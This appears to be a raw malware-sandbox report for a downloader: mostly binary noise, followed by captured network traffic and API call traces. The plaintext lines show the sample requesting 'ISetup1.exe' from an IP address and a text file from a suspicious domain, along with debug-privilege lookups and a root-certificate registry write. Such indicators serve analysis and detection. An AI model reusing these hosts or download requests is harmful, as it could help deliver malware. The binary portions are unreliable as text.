žõ¦žŸô¦›™ù€€ô‘‹–õ™õš™•ô–œö¢¡˜ôšô€û…‚õ›˜”òšš—ó™“œöš‘óö€ƒõâÙàóðôóõøùûõ¡œòpnoñnhpõ¥®±øï÷öñìßäôÉÊËñuwr÷àÜÚôáàèòãÞÙôÞØÛñÜÓØõ€€‡ö¾½»õ×ÐÐóÔÖÑóÖÏÓûËÔÉøÍÈÍôŸ ™û‹‹îÑÌÁöÈÂÍöÉúõ¼Ã¿ù¾ºÂôvy~ö¾³¸õäáçøïòòö¨¥­ónklóggwñ¦§§óôóôòÑÙÚøËÍÊõsr{óñçßøæÞáòãÝÞöáÜßðÜÝã÷„ô¾µÀôÙÓÓúÜÞÔóÙÑÐ÷ÞÑÌõ×ÌÈ󣛝öˆòÎÊÇöÇÊÈ÷ÉÈËóÃÂÄûýÅó~„õ¸°ªòÔÔÓõøïùñ«®§õoiiôphpõ¤«§ïôôðùÛÛÙöËÆËñwytóëðâõîåäøêäêöáâÜðääßð‡…ƒðÁÂÀøåÛÞðÞá×ùßÕÔùÑÕ×÷ÕÖÖ󢗟󆋑ôÓÐÏòÏÈÅòÏÊÈôÑÇÄôÍÂÌõ„€~𱯪ïÙÐÏóòôöö£¥ªôefjôqll𬥧õòóðõÛÓÔöÎÊËøwt{óêïíóïëðöñèèñåèäóçåèô‚‡€õÎÀÇðãÝâøââåøßããïÞÙØñÙÞÕö ¦šïŒðÖÛÒïÖÍÑôÒÒÎúÑÉÒõÍÏÊóƒ~ø²¸²ñØÑÕóò÷õ÷¤¦®øfkuóirk𥫥ñöôð÷ØÖ×óÐÎÍöpvqú‘„úŽ††õŠ„‰ö…Š‹ò„Œ‡ø~}}ò€…ƒó……ô‚~€ñˆˆô€„ó~€ôƒ‹õ‚÷‚€ö…„ôƒ…ô…€ì€yzöº«³ñÖÙÖûùôõô«²¤ôpokòohfõ­§³ñöõô÷ÙÓàñËÎËôpusúÔÕÔøÍÍÑöÉÎÊ÷ÕÌÎòÌÔÓòñ¸¬°öÏÉÄòÍÉÈôÉÉÅôÂÁÉòÂÉÆû™Œ“ôŠƒ†øÁ¼Àõ½¿¶ó½ÀÁï¾½¹÷½´·õñ±°µõÕ×Ûóöõõõ²©¥öligîllm󧥧ñôùöøÛÞÝòÍÐÐótuuõøó÷ôóõö÷õòñùðóú÷õõñõŒ„‰óÌÌÑøíìéõèíê÷íäêõçæàóæãßù¢£¤õ‡óêÚÜõÛÚÙõÛÞÞõÚ×ÜòÞÖÝó…ò±´²ôÐÕÑô÷ùðò¨©¨ôgptöonn󬦦÷öôñóáÚÝðÕÓÐøq|töùöð÷óô÷õñôöð
Data received ïü÷ûò÷ôùŒŒô×ÑÏïððõñïíõ÷îòë÷ïéíóêèíõ¦¤¦ð„ŒõêÞâôáãÚñäÜäòåÜÝøáßÝð‰†ò®¯¯÷ÎÑÚòöðõ󣩨÷ikqöeijö¦°¤ñõûöùØÙâùÖÖÔöv~qôööôóõ÷óõô÷ñôôó÷øïòûõŒŽŠöÚÙÌõõðóùöôïõõöñôîñïòèõêòª©°ôˆŠóêìæñîæéôááçóêëãõçãÝù‰„𳫲õÑÕÓõööóù©¦§ôikoõlirô¤­®òôöõúâÙâ÷Õ×Ôözvrøôõ÷÷öóòôòóñ÷óôúøõ÷ûñˆ†ŒõÐÔÏôöùøúõöõõï÷ïðôðøóò÷ì侮¤î‡ŠŽõïäèôòèíõééåôéîÝõáãàö‡‹„÷¶¯µ÷ÚÕÓôô÷÷õ­«¥ùhinøilkñ«¬±õõ÷õõÛÜàøÑ×Òðuxsõ}vxòsvwôw{yïs}tðzrwøpyr÷suuôyptôxszòyzsòpwsóqwyùv|sö…ŠŠõv|}øwp{ò}yxösxtöx|tùxstõ²¯´ûÑÒÒöñ÷öñ¦ª¯òmnmöqkoò«¢­ò÷÷ûóáãàõÖÒÖøtw÷ñôññ÷ùô÷ööõñò÷÷óòó÷ô‰‰‡ôÎÚÕöøò÷õõôôùôôöõòõõýõûòõ³²­ùƒŠóóõöøôïñôòññöìôïôìòè󄏎ö°³´öÑÛÓôôùòúª¥«òjorôpkrò¨«ªðõóñùàß×ùØÕÚðstvõñóùôóööóöùý÷÷÷öôóöòô‰„…óÎÓÖõøöó÷õûú÷ïûóööòóð÷îò÷£­®ôŒ‡Žøûñôöõõòôîìô÷òòôøïñ÷÷ˆ†ô°±¬òØÑÔõøõúõ«¬¥õjqqòkomø¬¬­õóõóóäÝèùÝ×Ùõtqrù÷÷òõ÷öùòðõôòõôøöòñ÷õ‰Œ‰õÐÑØòó÷ò÷ôõòðóøôóôññôõöõõ­«¯÷ˆò÷ñðö÷øõòõóõôóõðóõîô󊏉ô¶¬´òÓÑÔôóöò󰮧÷jqwùjmeò­«§óùôòøßèæòÝÓáövtuööõ÷ñøôóóô÷ùï÷ð÷óúù÷õ……‰õÐÒÖûòôñïõóöóöõ÷øñöòôõ÷úõ¬¯«ï…Œ÷ñõôôõôöð÷õóñöõöù÷öõö‚ˆ„ú®¯²øÔÐ×óõôñõ¯®¦îflmöiqmúª®¯òööøïææåòâÑ×ôö¨¬£õïðïñ÷öòööóñõõö÷󍈏õÔÕÎ÷òñóöõòøóó÷òôùôñùõöîö®¬¯ùŽ“ôòùøñõñð÷ôöõôëïåù³¸´óxz~õÆÁÂïÝÓÓòóöññ®§¯ônmrðuklñ¦¦¦øôñùõàÞåõÙÛß÷ÁÄÉ󇋊øsrzó}rz÷{zyóorzòpsqòytuòulpôu|xôoyrówwvôyvrön{uõxowùtyïx{tïpqoízwsó€~ò²´²ðÉÊÎ÷Ö×Ùïùøô÷¤­¦ðknkúlsgô¤§¥òðôòôÞëæ÷ßâÖñÜÝØöÝßÖöÜáÛöÜÛÜõÕÙãö×ÛÑòÛÖØóÚ×ÓôÔÙÖõ×ÚÐõÕÒÕñØÑÑ÷ÑÕÔðÓÔØñÓÓÐöÑÑÏüÒÕÌõÏÖÌøÌÊÉöËÆÎôÈÎËóÍÇËõÑØ×ïöööù°£¬ðnmk÷ngjô­°®õöòøôçêìöàÜÛôÝáÙñàßáóãèÝõÝÚàöÞÔÕúÚÚÙöÜÔÞôÔÙÞøÒÓÛôÒÒÛôÓÖÔòÙÓÔ÷Ò×ÒùÑÓÐòËËÖóÙÑÒóÖÓÌòÓÑËöÒÈÊõÌÉÉöÑÇÓ÷ÉÄÅòÚÖÞõò÷ñò¨¦§óplkõpii÷¦¨¨òôùõñéççôæÛæøÑÀ´î®™ô²•~ô²–€ùº˜€õª—ô³šó³”õ¯•€÷­’õ¬”~ö¯œ€ó²•{úªù®–ò¬Žõª“}ó«”|ó°‘xð­—uöÁÀ±õËÇÎöÜÔÖ÷øòîõ®­«õukkûdmqö©¬¦öùðóøéãê÷ÛÎÎõ‡g"ò¼”S÷»žhõ½”jõßmóàgñ½¢lóÅ ióşrô¾ nø¿¤rõ»qóÁ¤tóŞeïÁŸjòÄ£köº¡c÷ǛdòȖZù²Jõ’k0óÃʾóÔÛÔôñòùù©¯±ólh`ñlknö²§©ïøúõðæëï÷¼¢€ö¹Wôõíïùúôðòóøøøñøó÷óñóóõõñòõýóöñöôöóöøôó÷ñõóöðûòô÷õô÷ùõöóòôõôõóô÷òõïõõñôóøõñíñô™{5ø³¥öØÖÛõôûøø¥­«ôjijùrdmö­­¬ùïôöóëëéñ´ðĒ\÷ôö÷ø÷á¨õñä«öñæ´óðæºôôê¼úõâ¸õòæ¸÷ôè·úòç½øòåº÷ïæ¸öóæ¹òùå°öôé´óòè°õõܪòõàŸ÷ùôôõ§6õ·ª¥ðÝÖÚñûø÷ñ°«­ôlqnñnsvô¢©§ôôôõöëçæ󷚀ö¾™Tóùôõöùä¹óõß¾òøæ´óöÞ½ò÷ò»õñð¾ûóíÄóíî½ö÷êÃñöîÄòùë»òîç¸óöé¼õôá¸ðöìµ÷÷ã²øòÞ©ø÷öñú§~9÷ñ¦øÚÙØöøô÷õ§¨«ôhpmòorjù«¨¨òôùõóðîèö½›€÷½‘OòñöôóóÞÆøöîÂô÷è¾òøë½õôéÂúøèËúóëÊô÷ãÇòòîÊõïïÎ÷øìÄóöîÃóðèËõöåÄò÷å³òòäºõòâ½õóôöô¥€0õɳ£ñÞáØöô÷ñú­«©÷qrdðqmq󥪩ôöôôøéíîò¸›ñº”P÷÷øöòóâÄ÷öíÈò÷ëÃõôëÎùòîÏóõêÇòôìÔõôéÎôòòÍ÷õçÍôöåËóúçÐõñéÅöøæÆöøìÊôòîÈ÷÷ã¿ññòøó©~3ù¿¹¢ùàÚßõô÷óõ­«ªôoonômnmð©­¨ôööûøííìô´œ÷½ŒOú÷õôöôéÔö÷éÓüöæÏòôçÌñõîÛõøìÔõîîÎõøìÚôôîØòõëÓ÷óìÑùòäÔúõéÎóóîÔóòìÆóøìÍóöðÍøööôø 7ôį£óÞßÖøõñùñ®¥¬ólrtïkfk󪣭ñòõò÷ññðö¼£€øÁJôóõ÷ùûìØõõèÞîøòØûòëÙùõíØóøðÛïõíÞóòòÛ÷òóÖóöêÛôõëÛøùìßõôïÓòöñÙòúèÔúòëÖðõèÓ÷
Data received WÙ؜Á5¤ÖœªìéþÈ"~Kà^õɖ0DOWNGRD 0ÑbÛ9—|~¹øÝñ³õ"2sYëÑN¿m±¤&neÀ ÿ
Data received GA‰¡7Ê¶“êòä=º§ÿëÔVtˆ–Fý2ž„(i Ûúё7N/êq‘[›^P[vOZß>¶ÿq´J‚£ÒF“x/¤z>9§XzFI#ˆÉIpñrµ Ñ2JgÿàÜáþt܇ ËÀhÍ=¢Cà1Öh['¯K÷jh »ûŠ Ä|/‚ç?òžª©ã~3¬ÊxËíäш¸r„§&]€ÙX½ .6~›MÙúKêíêKŠÁ•‡Þ„Ÿhé«£çõÛò¢Ý¢‚ÔK¾Ad§,þ‡¢Í²ÀȌôXC¯8#ÌúüT}yòñkHƒô"è¤Jñ¾=ùu–úãA–©õ$Û/žèö±x‡>V(šÒû²2•àjß~==˺Kx|L¼FV4åý_ˆ‘ ‡ì¶ã¿›ôJSM!ltA揢 ˜E¬yéÇH¿
Data received ‹´c®º~1¿0b×S†ýWzË1Ÿ9I£f|º¦Á¶¹Ó’µŒá-x†c4Mú‰
Data received ð
Data received ú¸éJ4[VߟêŸã²@nþ[ÀÝuç3#ÖxâêíU ;96„*à9&«ÜÂßSǶþÞ­Bþž‘K÷X²vs ´¾Â”Übœwå x†[yKÞY?û>žºƒexÿ€;‰ªý+,5F¦úe±òçŸþ¢,ßÖ7^Ö e£ÅNZÎÀÇ&<ˆ™£+¯58jòÒöÞ"v¯ 3@ÇDS\åýì‚Å=V éթiò8ÿNbJõœÛ|²E…â'RIäôy ÌÁ_ã—4¢&U%‚|uœ~á¥qeø`¬ÆY “Ì>X£GºäÕáÝ òË·²Îo­Ücí€-=E«(æ-@0¼±Mï¼±7lÁÓ9^ø8FÞ¯ΝÀ„,Ÿ„œ=ŸoYóú£`Ž*kÜã¼ðyÞ¹:%Ø$÷ÐA$®éÎ<R&™©c“Ë(‘3ôã>QXÐ}¦COظ<òÿaTÀ®:Š2#)HšRJ Ò¿#¹© kµtQøN%8èZ´âGàï)NtЍ8JŒs¤rà×2Z ùÌ{m'ßø‹ž—^ƒ©V‹Z@2y^@ñhmî<íµŒÚ5d;¾«˜pÊ¿=¼Q݀>ýQ·ÕÑ'¾|XõP ó—U€Z$`ˆëgøìçß[
Data received HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Server: Caddy Status: 404 Not Found X-Powered-By: PHP/7.3.25 Date: Sat, 27 Apr 2024 02:55:04 GMT Content-Length: 17 404 Not Found - 7
Data received WŒw`‰»_6џêéfÌ[ìHWtL¢ƒDOWNGRD >rfømîâxç þA¡W#(”„#5N¹èÀ ÿ
Data received GAÿò‹v"g¹¦GÛÌ*maՑ|€Ï3èfæ5J(©Å ÑöšŒ&ΫÁf¬ÖÐñÏoj.ª5®êVÿi;vŸ:ßóCGdSúÒWXK«z‹ˆ÷Ò!µ9ãþ=Û…ù˜—ÚÃõ^箲Ê× ‰o™rX<xò/8XKDæȒL[ˈ6¡3( ´éqÚR¹³ÃŽì(üe/ËËý¦HB‚-¨ëíwÜ­¬äÃ1ÂÀ)(%ßIƒXœ "jO@ÌՕ7<¨}+ŸáwVŽõ—«é‰ _“൫U—©ZÈq”ÚD’²<m°Uv-€¢E¿”2#e‹ÿ¦ÃáÉÙÝÀAßõVÿrE€c ]î îù_^‰óÞ¤´”ƽÿ‰ðKdX°"”-o«h•"Ó¸ŠfÙ]ðÑvÈø»À
Data received ·Âÿ†xCPM˜=aÅ-~6(p๠˜¸<ûâ\jŽkZÖ$-F\Æ+í|G
Data received à
Data received Y«ÿübÞ¸U¦šòƒ Ù,ƒî…áI…!ìT‹awrtàAi­±ÖkG}Ž=q¤Ð­ u°%Äb¬î0«vîm#`E)œ‹3-‹f*Žõ-ÝÈ®W¡ÜQ<“D_XÙ½yEl«±%ae`Ú¹‰@å±Î˜²É%ö ̘.Cÿ"?Ø·ÕC© íyHæƒ.SÂl5½o¼=@Á“Ý´¦«@#e8 Î§ªg×ÒþòԙäüéËnR•*l™áiºïÛ÷ÕΆ†EşúCõµFgí@Û($B7_H—>Vø8ä¥.ità€66Œˆz֘ .ࡓ’Ü!ªa?ÞC1ú÷ó²U©Emòàa»ûù` ó(½ö‡Íhݛ5Ï}K™u@ÙÔôO§Öe¥ž³zëwú5cþã3{(ã’æi+â3ۉKð’³Àâ¸Ü/K& ,܀écrG ŸzŶÐÂÁ?d¦CzëY%ʞJþœqlSGȀ›lRÌ !H)çªËh¸‰%—ҜΪªÉ”.Ðv³ñÿkJ+Iµxˆ~ñÍZ¬þUœ>»[iŽy—¢Ÿ$Ö¶2Þ$5r˜…n;E$$îXTÙJHø¦l&v,³ö¼/ç«ÁÌ©
Data received ]
Data received YÌF6uS”q³nM_ZÈíE0ÙÖ°0ÉDOWNGRD R1Üá0O^Ù¼ê@Š*îYé]GÓÆÜ8.qûöÊÀÿ 
Data received Ã
Data received ¿¼50‚10‚ ï+Eb›-ÍÅRޓ·ÿÊþ 0  *†H†÷  021 0 UUS10U  Let's Encrypt1 0 UR30 240407095059Z 240706095058Z010Umonoblocked.com0‚"0  *†H†÷ ‚0‚ ‚À@I{1¼†·p¾¼rsMÐ,©¥çŽêÏ_™¡Q.éòýÇÆȄ åÔdJí>¥KºŽ†'×BáM.ÛUeáQLA@%4D%)uƒJŠÎ%%NU=Öÿ¦?º¡Y–ôÍY‹Êx3áâ\ÓµåfêGÈ^¦ÛÑÂccl‡8ª•Å¸ˆšÝj¾!÷oº¯R é÷J÷9£çÈÊÝ€ªGµMZ†Åc=&¤u åƒJ2æ€lkºV¦³^åú÷À¨ºdEï ,ž-Ò?.AØÕCtuAgEo¨íÅÕV¨§ñRê‹ý¨K?µ…èüJ¥·›k}9j3£‚W0‚S0Uÿ 0U%0++0 Uÿ00UŠ&*̅6Æ+$朣>ó7á÷AdÓ0U#0€.³·XVË®P @毝‹ÂÆ0U+I0G0!+0†http://r3.o.lencr.org0"+0†http://r3.i.lencr.org/0aUZ0X‚befer.monoblocked.com‚monoblocked.com‚www.befer.monoblocked.com‚www.monoblocked.com0U  0 0g 0‚ +Öyôñïvvÿˆ? ¶û•QÂaÌõ‡º4´¤Í»)ÜhB ŸægLZ:tŽ¸.Ñ<G0E!ùN×.ͨ끉ͬ8c¡ò½sÜ=³Þ¡§Îq6´¶ S%Ž'Jƒ¥Tm…¢UVòœ‡NºïEîþ"`§à÷ûkuH°ãkÚ¦G4åjú0ëRËVÝ,Ù»¿«9؄sŽ¸.ÑdF0D ^„™yÁ—r,ߋ„ bšñÑú§Ýºø˜k`;› @èšTF©Ž/™àÉ[ Prpxáÿbc Fie=À1Ð0  *†H†÷  ‚ ˜';ÀPL°bºÍi¸ “o ÷·.ÛjêΔT“ìà;z#Pµ·ïƒôèÚw1˜®”õ aÏ”Mò ÅH+5НókD&Á5\ÓÖ!½“œ¾Kxåkâe91…Lþ?¡Nêø=åǖÐÕÀæ9ä_]Œ:Ä{Iõm³ðGU ü–a\e¬0ÊbiFZÞkFN²òJ‡&yê›Z*‡ïÕù½™<e¶>£j¾¡Mßi˶IuÇxQõ߬>«r¾úÅVÛ(ÉúùúÐ<$WÞ«’“çw+¹{”qwßþ8ç‡áãǝ¥=zwÍ‚[JØé&͒{ò0‚0‚þ ‘+JÏ §SöÖ.%§_Z0  *†H†÷  0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10 200904000000Z 250915160000Z021 0 UUS10U  Let's Encrypt1 0 UR30‚"0  *†H†÷ ‚0‚ ‚»(Ìö ”ÓìU’Ãø‚ñ™¦zBˆ§]&ªµ+¹ÅL±¯ŽkùuÈ£×G”U5WŒž¨¢9õ‚<B©Nnõ;Ã.ۍÀ°\óY8çíÏiðZ ¾À”$%‡ú7q³ç¬á›ïÛä;ERE–©ÁSÎ4ÈRîµ®íÞ`pâ¥T«¶m—¥@4k+Ó¼fëf4|úk‹W)™ø0]ºroûÅ­Ò†X=Çç »ñ+÷†ÜÁÚq]ÔFãÌ­%Áˆ¼`guf³ñ÷¢\æSÿ:ˆ¶G¥ÿê˜ w?SùÏåõ¦p¯c¤ÿ™³“ÜS§þH…¡i®%u»ÌRõíQ¡‹Û£‚0‚0Uÿ†0U%0++0Uÿ0ÿ0U.³·XVË®P @毝‹ÂÆ0U#0€y´Yæ{¶åäs€ˆÈXöé›n02+&0$0"+0†http://x1.i.lencr.org/0'U 00  †http://x1.c.lencr.org/0"U 00g 0  +‚ß0  *†H†÷  ‚…ÊNG>£÷…D…¼Õgx²˜c­uM–=3erT- êÃíø ¿_Ì·p·n;ö^”Þä Ÿ¦ï‹²碵<‘δí9ç|%ŠGæen?FôÙðΔ+îTμŒ'K¸Á˜/¢¯Íq‘J·È¸#{-ùW>ƒÙ3 G!x ‚'Ã*ț¹Î\òdÈÀ¾yÀOŽmD ^’».÷‹áèD)ÛY íc¹!ø&”“W eÁ "® C—¡~àà†7µZ±½0¿‡n+*ÿ!NÃõ—ð^¬Ã¥¸jð.¼;3¹îKÞÌü䯄 †?ÀUC6öhá6jŽ™Ñÿ¥@§4·ÀÐc959unòºvȓé©KlÎ Ù½ûŸ·hÔe³‚=wSøŽy­ 1u*CØU—rÄ)÷Ä]NÈ®F„0×ò…_¡y»ç^p‹ᆓùÜaq%*¯ßí%PRh‹’ÜåÖµãÚ}Їl„!1®‚õû¹«È‰=áLå8ö½+½–ëÕÛ= §~YÓâøXù[¸HÍþ\O)þU#¯È°ê|“/ý¬¢ GF?ðé°·ÿ(Mh2Ög^i£“¸õ‹/ ÒRC¦o2WeM2ß8S…]~]f)ê¸Ý䕵͵VBÍÄNÆ%8DPmìÎUþéIdÔNʗœ´[Às¨«¸GÂd0‚`0‚H @w!7ÔéB¸îvª<d ·0  *†H†÷  0?1$0"U Digital Signature Trust Co.10UDST Root CA X30 210120191403Z 240930181403Z0O1 0 UUS1)0'U  Internet Security Research Group10U ISRG Root X10‚"0  *†H†÷ ‚0‚ ‚­è$sô7ó›ž+W(‡¾Ü·ß8Œn<æW x÷u¢þõjnöO(ÛÞh†lD“¶±cýk¿Òê1›!~Ñ3<ºHõÝyß³¸ÿñ!šKÁŠ†qiJffl~<p¿­)"óäÀ怮âK·™~”ŸÓG—|™H#Sè8®O oƒ.ÑIWŒ€t¶Ú/Ð8{p!uò0<ú®ÝÚc«ëOŽK~Ï èÿµw.ô²{JàL% p) áS$ìÙJŒ?‰£aQÞ¬‡”ôcqì.âo[˜á‰\4ylvï;byæÛ¤š/&ÅÐáÞÙŽû·÷¨÷Ç嘏6•çâ7– 6užûr±›¼ùI؁Ý´*ÖAé¬v• ØßÕ½5/(lҘÁ¨ dwnG7ºÎ¬Y^hr։ÅA)>Y>Ý&õ$ɧZ£L@F¡™µ§:Qn†;ž}r§xYí>Qx Ð/²>{JKsüÆêàP|C“t³ÊtçŽÐ0Ô[q6´ºÁ00\H·‚;˜¦}`Š¢£)‚̺½ƒ¢ƒA¡Öñ¶ð¨|†;F¨H*ˆÜvšv¿j¥=ë8ódÞÈ+ (ÿ÷ÛâBÔ"Ð']áyþçpˆ­Næً:ÆÝ'Qnÿ¼dõ3CO£‚F0‚B0Uÿ0ÿ0Uÿ0K+?0=0;+0†/http://apps.identrust.com/roots/dstrootcax3.p7c0U#0€ħ±¤{,qúÛáKuÿÄ`…‰0TU M0K0g 0? +‚ß000.+"http://cps.root-x1.letsencrypt.org0<U50301 / -†+http://crl.identrust.com/DSTROOTCAX3CRL.crl0Uy´Yæ{¶åäs€ˆÈXöé›n0  *†H†÷  ‚ sl–nÿRЮ݌çZ­/¨ã¿É PÂålB»o›ô´OÂDˆuÌë›bnxÞì'º9\õ¢¡nV”pS±»ä¯Ð¢Ã+ԖôÅ 53ùØa6àq´¸µª‚E•Àò©#(çÖ¡ËgÚ C,ª“ÉÞõ«i]õ[†X"ÊMUäpgmÂWÅF9AϊXƒXm™þWè6ð#ªýˆ—Ðã\”Iµµ5Ò.¿N…ïà…’ë;l)# `ÜEL;éûÞÜDøX˜®ê½EE¡ˆ]fÊþ
Data received éo‚ÈB ûéìã†Þã8ú¤}±ØèI‚„›+èkO 8w.ùÝç9
Data received GApäØ[ÍñKÎ#Ñ*7|°«9d,Ô/E㬻¾Ð*ÉnM6M‘³|qì ~ ½òކ¯_6Û§=1ÎïIJÚæAh¦mÇìŸ2ð]lœÍ*tĬ·ä|§ÛF² ´áKÎǑ å‡Y/g¯2¯àɧNúÉmÐÏX|¦zޑÂbÏÁ:¬D9»LUxÿ5øÇmJŽ~¥Eoo(€U'Ñ 6ŠgMM´›èhy<$i4ƒqUCB9ãQºCíÒfŠ¤¹ÖX^¥Î³7ÙÒÕn¹º}܀­I5´C‚õËD¨‘jVø Ì蛠bš'ø1ŒaFb{ý»|®2tfãýٗՕ,#üYy[À€GD ûŽŸNӂGÙþî2K<<-•ò'”\rì|n¥ k«ô”( ¼:óýݚ³+é¼¨
Data sent {f,höÖ:Ùd×?pûñ¸ãQg¡amÉʳ›žÝbø/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
Data sent FBAÊ;&¶[£æbe…6Q5”¦pƒìˆçÉyÓ'—ƒ[–¹3úÔÎB8ҝ@ËÓ+¯ÑxŽÄþq(‰*1¢GKŽ‚c0Öz Uh.àú³Î ð51Åà“*BÉ.ãL qe{d+=*5ºÃõIÁ“é•TkÉ
Data sent €¨‡ÌvGwq æóåQéÒkÙºf³tZݖ¼LAaš0UëwÌ©•­ÅeèPO2ÇÓd~À«±î\»ƒuêAví/#ØS§vÿe#+Þ) ÷€½ ¤Áæç  ñ½ã"UžQ£Ÿ"xK*½¸ñN¤á±Ddsôtœ¤ßïwD
Data sent {f,høGêäŒE“)ÜÈfm„|¥ *·®¯{¸/ˆ/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
Data sent FBA5Yž*¦76ƒŸ3*ÖYpŠñA¥Ôü·ïÉÛvf½™¿´³wXâi}±r Ì¡š*|T(”‹eoÇøÂã7e0ÖÖB:ѝÁ†2ýks ¡$šsޝ3úükÉ ºc:ILrrÉcP¹ n1¬H¥
Data sent €‹Ò—@:`‡Ã^oÁÓûø-âP nu¦Ô!xUËi˜" j5dH֋«‹Ä|4-or› À•¬. l%sTÛ;1!cWÑÏM*¿}„õÅOD"ß;þ7¼+SœwÛüHp!®ûòrJ;‚†…XO×ZIÎÍzO-Ý;4ãIæP
Data sent GET /ISetup1.exe HTTP/1.1 Host: 185.172.128.59 Connection: Keep-Alive
Data sent {f,hýw¯8@ÏwÈÕ3ex!Òål;Úg&(¡8§c­/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
Data sent FBAåm“âŠÆ´ ¹Ð§|× úf?cÖû‹àºÉÖ§ Ɉ©ì~5Ч©PÖÃóÔ‰t>³ÊF={§êçR5}„0>g¼_©žädÅ<J¿º¸´D†œ³ø€ –´£gcmì·“¹?ºsäZᩎb–­
Data sent  ©æ‰„¢k ]öûp¡ŽªŸWYÙëP™?t3å(ºûQž(Á»N}y÷ÃÈö¡œ¡ƒÕ¡š:÷”<ÜAº(4f Äú䵟Õ'9}¬ì¾ ¹ÙD)#?ûmaƒÍ¬¬ZþÙÑb.>7­~BcÉ|¼Òºû1ån é–ÄDîóü´U'=÷Óe)ZÔô_u0««¸ bõ4ôÉáÞºÚ
Data sent GET /f/fvgbm0216901.txt HTTP/1.1 User-Agent: InnoDownloadPlugin/1.5 Host: 240216234727901.mjj.xne26.cfd Connection: Keep-Alive
Data sent {f,i  ûY¢D›žâ™¾3XK ÚML<7è|-_ëò/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
Data sent FBA«'BIËéb9¯i}ÛçH¸œ¬Òæ[nl úþ »zغ-­ íÿºÒù‰Ù‘Þ~öÄÂ7ƒ½Mâ’TcؐÂ@0Îw¾Tm¨†ª j®­˜8ïaÿ:6ó—^ÿ÷ƒtu‘ªÏaãöÙQž+R¬°ýQ-
Data sent €ã"@!ÍÇYùÇ7Ñic”‡6Ê[=õ>ñ{`X"ÆC+mm‰.džþVõÿã?s BŒ’‹äÔüzü±69ªíYûا)1o›(‰“.”Ô²RŽö%¼…– aÁŸYŠFGÈî´)‚ºíЯÀüâäôšãí®UQ8JÁ†»O± Ë
Data sent rnf,i {ge`Š|HaW£$ˆ‘­px"i^ïngê߬Ò/5 ÀÀÀ À 28-ÿmonoblocked.com  
Data sent FBA.mµJ­`&.ê5¿0d|Ûû/±”xMl# Ηô=;ñ]üÖãw yH.Ô½“ŠÚ:ê&RÙïŠ40d2lxàÇ•ë•À"tLÙ[^§÷h†·2üc-h§HFÚsJqe/ÅföwÇd
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 185.172.128.59
file C:\Users\test22\AppData\Local\Temp\nsvC242.tmp
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: {f,höÖ:Ùd×?pûñ¸ãQg¡amÉʳ›žÝbø/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
socket: 1428
sent: 132
1 132 0

send

 buffer: FBAÊ;&¶[£æbe…6Q5”¦pƒìˆçÉyÓ'—ƒ[–¹3úÔÎB8ҝ@ËÓ+¯ÑxŽÄþq(‰*1¢GKŽ‚c0Öz Uh.àú³Î ð51Åà“*BÉ.ãL qe{d+=*5ºÃõIÁ“é•TkÉ
socket: 1428
sent: 134
1 134 0

send

 buffer: €¨‡ÌvGwq æóåQéÒkÙºf³tZݖ¼LAaš0UëwÌ©•­ÅeèPO2ÇÓd~À«±î\»ƒuêAví/#ØS§vÿe#+Þ) ÷€½ ¤Áæç  ñ½ã"UžQ£Ÿ"xK*½¸ñN¤á±Ddsôtœ¤ßïwD
socket: 1428
sent: 133
1 133 0

send

 buffer: {f,høGêäŒE“)ÜÈfm„|¥ *·®¯{¸/ˆ/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
socket: 1424
sent: 132
1 132 0

send

 buffer: FBA5Yž*¦76ƒŸ3*ÖYpŠñA¥Ôü·ïÉÛvf½™¿´³wXâi}±r Ì¡š*|T(”‹eoÇøÂã7e0ÖÖB:ѝÁ†2ýks ¡$šsޝ3úükÉ ºc:ILrrÉcP¹ n1¬H¥
socket: 1424
sent: 134
1 134 0

send

 buffer: €‹Ò—@:`‡Ã^oÁÓûø-âP nu¦Ô!xUËi˜" j5dH֋«‹Ä|4-or› À•¬. l%sTÛ;1!cWÑÏM*¿}„õÅOD"ß;þ7¼+SœwÛüHp!®ûòrJ;‚†…XO×ZIÎÍzO-Ý;4ãIæP
socket: 1424
sent: 133
1 133 0

send

 buffer: GET /ISetup1.exe HTTP/1.1 Host: 185.172.128.59 Connection: Keep-Alive
socket: 1936
sent: 75
1 75 0

send

 buffer: {f,hýw¯8@ÏwÈÕ3ex!Òål;Úg&(¡8§c­/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
socket: 1420
sent: 132
1 132 0

send

 buffer: FBAåm“âŠÆ´ ¹Ð§|× úf?cÖû‹àºÉÖ§ Ɉ©ì~5Ч©PÖÃóÔ‰t>³ÊF={§êçR5}„0>g¼_©žädÅ<J¿º¸´D†œ³ø€ –´£gcmì·“¹?ºsäZᩎb–­
socket: 1420
sent: 134
1 134 0

send

 buffer:  ©æ‰„¢k ]öûp¡ŽªŸWYÙëP™?t3å(ºûQž(Á»N}y÷ÃÈö¡œ¡ƒÕ¡š:÷”<ÜAº(4f Äú䵟Õ'9}¬ì¾ ¹ÙD)#?ûmaƒÍ¬¬ZþÙÑb.>7­~BcÉ|¼Òºû1ån é–ÄDîóü´U'=÷Óe)ZÔô_u0««¸ bõ4ôÉáÞºÚ
socket: 1420
sent: 165
1 165 0

send

 buffer: GET /f/fvgbm0216901.txt HTTP/1.1 User-Agent: InnoDownloadPlugin/1.5 Host: 240216234727901.mjj.xne26.cfd Connection: Keep-Alive
socket: 1932
sent: 133
1 133 0

send

 buffer: {f,i  ûY¢D›žâ™¾3XK ÚML<7è|-_ëò/5 ÀÀÀ À 28:ÿ!d68kcn56pzfb4.cloudfront.net  
socket: 1420
sent: 132
1 132 0

send

